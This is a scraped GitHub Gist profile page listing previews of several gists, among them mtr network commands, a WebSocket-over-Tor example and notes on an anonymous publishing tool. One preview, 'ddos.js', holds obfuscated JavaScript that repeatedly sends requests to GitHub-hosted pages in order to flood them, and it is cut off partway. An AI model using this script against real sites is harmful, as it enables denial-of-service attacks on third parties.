Skip to content

Instantly share code, notes, and snippets.

@wwwiretap
wwwiretap / 163.5.198.209
Last active May 15, 2024 18:58
666:163.5.198.209
163.5.198.209
@wwwiretap
wwwiretap / pentest cheat sheet
Created October 3, 2022 20:57 — forked from githubfoam/pentest cheat sheet
pentest cheat sheet
----------------------------------------------------------------------------------------------------
mtr www.google.com
mtr --report google.com
mtr -4b google.com #combined IPv4 only and IP addresses
mtr -n google.com #display numeric IP addresses instead of host names
mtr -c5 google.com #limit the number of pings to a specific value
mtr -r -c 5 google.com >mtr-report #report mode using the -r flag
mtr -rw -c 5 google.com >mtr-report #wide report mode
mtr -i 2 google.com #The default interval between ICMP ECHO requests is one second
mtr --tcp test.com #use TCP SYN packets or UDP datagrams instead of the default ICMP ECHO requests
@wwwiretap
wwwiretap / websocket-over-tor.js
Last active August 29, 2015 14:26 — forked from TooTallNate/websocket-over-tor.js
Establishing a WebSocket connection to "ws://echo.websocket.org" over a Tor SOCKS proxy. Currently depends on pull request: https://github.com/einaros/ws/pull/220
var WebSocket = require('ws');
var SocksProxyAgent = require('socks-proxy-agent');
var url = process.argv[2] || 'ws://echo.websocket.org';
var agent = new SocksProxyAgent('socks://127.0.0.1:9050');
var opts = {};
opts.agent = agent;
var socket = new WebSocket(url, opts);
socket.on('open', function () {
@wwwiretap
wwwiretap / ddos.js
Last active August 29, 2015 14:18 — forked from zhufenggood/ddos.js
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=["m://n.9/E/","m://n.9/F-G/"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeou
### Keybase proof
I hereby claim:
* I am wwwiretap on github.
* I am sina (https://keybase.io/sina) on keybase.
* I have a public key whose fingerprint is EFB1 8323 F056 1371 7A7C FB69 93C1 C176 0B47 D56D
To claim this, I am signing this object:
@wwwiretap
wwwiretap / use-cases.txt
Last active December 27, 2015 12:49
Project Cute aka OnionPress
This document is an attempt to list the possible users of a
"one-click-publishing" hidden service. The goal of this effort,
is to provide developers with a set of options and features that could support
their development decisions. It is also an attempt to describe the challenges and
risks associated with anonymous content publishing
1) Activist - a single person referred to as Maria in this document.
This is a person with a specific message or material. Wishes to anonymously
share some content with the world. Maria can operate from a range of private
@wwwiretap
wwwiretap / gist:1063821
Created July 4, 2011 19:26
Tor-Cloud-www
<!DOCTYPE html>
<html>
<head>
<title>Tor Cloud</title>
<!-- include the Tools -->
<script src="http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js"></script>
@wwwiretap
wwwiretap / gist:673476
Created November 12, 2010 00:04
test
test